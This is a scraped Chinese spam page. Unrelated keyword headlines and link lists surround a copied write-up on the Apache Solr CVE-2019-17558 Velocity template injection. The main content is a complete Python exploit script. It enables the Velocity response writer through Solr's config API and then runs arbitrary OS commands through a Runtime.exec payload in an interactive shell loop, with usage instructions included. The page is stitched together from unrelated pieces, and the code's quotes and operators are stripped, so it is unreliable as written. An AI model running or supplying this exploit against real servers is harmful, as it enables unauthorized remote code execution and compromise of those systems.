当前位置: 首页 > news >正文

html5 企业网站模板做网站 客户一直要求改

news 2026/4/29 0:02:51
html5 企业网站模板,做网站 客户一直要求改,修改wordpress主页标题,适合seo优化的网站漏洞描述 Apache Velocity是一个基于Java的模板引擎#xff0c;它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目#xff0c;旨在确保Web应用程序在表示层和业务逻辑层之间的隔离#xff08;即MVC设计模式#xff09;。 Apa…漏洞描述 Apache Velocity是一个基于Java的模板引擎它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目旨在确保Web应用程序在表示层和业务逻辑层之间的隔离即MVC设计模式。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能利用Velocity-SSTI漏洞在Solr系统上执行任意代码。 执行漏洞py脚本取得shell连接 F:\exphub-master\solrpython cve-2019-17558_cmd.py EXP #!/usr/bin/python3 #-*- coding:utf-8 -*- # author:zhzyker # from:https://github.com/zhzyker/exphub # telegram:t.me/zhzykerimport requests import sys import jsonif len(sys.argv)!2:print(------------------------------------------------------------)print( DES: by zhzyker as https://github.com/zhzyker/exphub )print( Apache Solr Velocity Commons Remote Code Execution   )print(------------------------------------------------------------)print( USE: python3 cve-2019-17558_cmd.py url )print( EXP: python3 cve-2019-17558_cmd.py http://1.1.1.1:8983 )print( VER: Apache Solr 5.0.0 - 8.3.1 )print(------------------------------------------------------------)sys.exit(0)url sys.argv[1]core_url url /solr/admin/cores?indexInfofalsewtjson try:r requests.request(GET, urlcore_url, timeout10)core_name list(json.loads(r.text)[status])[0]print ([] GET API: url/solr/core_name/config) except:print ([-] Target Not Vuln Good Luck)sys.exit(0)api_url url /solr/ core_name /config headers {Content-Type: application/json} set_api_data {update-queryresponsewriter: {startup: lazy,name: velocity,class: solr.VelocityResponseWriter,template.base.dir: ,solr.resource.loader.enabled: true,params.resource.loader.enabled: true} }api requests.request(POST, urlapi_url, dataset_api_data, headersheaders) code str(api.status_code) if api.status_code 200:print ([] HTTP code SET API Success) else:print ([-] HTTP code SET API Failed Good Luck)sys.exit(0)def do_exp(cmd):vuln_url url/solr/core_name/select?q1wtvelocityv.templatecustomv.template.custom%23set($x%27%27)%23set($rt$x.class.forName(%27java.lang.Runtime%27))%23set($chr$x.class.forName(%27java.lang.Character%27))%23set($str$x.class.forName(%27java.lang.String%27))%23set($ex$rt.getRuntime().exec(%27cmd%27))$ex.waitFor()%23set($out$ex.getInputStream())%23foreach($iin[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23endr requests.request(GET, vuln_url)print (r.text)while 1:cmd input(Shell )if cmd exit : exit(0)do_exp(cmd)
http://www.hkea.cn/news/14454703/

相关文章:

  • php能建立网站吗本溪市城乡住房建设厅网站
  • 网站优化的前景工厂弄个网站做外贸如何处理
  • 成都网站建设公司有哪些内容关键词分类哪八种
  • .net双拼做公司网站WordPress众筹源码
  • 山东能源集团 网站建设新乡网站建设哪家公司好
  • 图片转视频在线制作网站优化公司排名
  • 卖磁铁的网站怎么做网站备案管局
  • 网站建设需要的准备网站不备案百度收录吗
  • 专门查企业的网站太原网站优化工具方法
  • 做微博类的网站难吗阿里巴巴国际站买家入口
  • 福田网站制作公司想招人去哪个平台免费
  • 厦门市海沧建设局网站购物网站怎么做优化
  • 电脑上做简单的网站sofish wordpress主题
  • 视频网站做app网页设计与制作教程基础知识
  • 电脑本地网站建设深圳网站营销型建设
  • 1小时赚8000元游戏seo研究中心教程
  • html网站系统沧州免费网站建设
  • dedecms网站地图模板深圳社保
  • 论文写作数据网站最常用的搜索引擎有哪些
  • 好用的建筑设计网站python编程100例
  • 高端网站设计北京注册公司代理机构
  • 合肥网站建设推荐 晨飞网络wordpress:代码
  • 房产机构网站建设目标定位WordPress略缩图upload出错
  • 做网站虚拟主机哪家好网页设计经典范例
  • 时尚类网站设计公司口碑好的做pc端网站
  • 建什么网站能百度收录wordpress产品展示模板
  • 教育网站开发用例图wordpress收录优化
  • 网站重购个人网页模板模板之家
  • 域名过期的Wordpress网站架构优化
  • 海淀网站建设公司排名建设工程合同管理考试试题及答案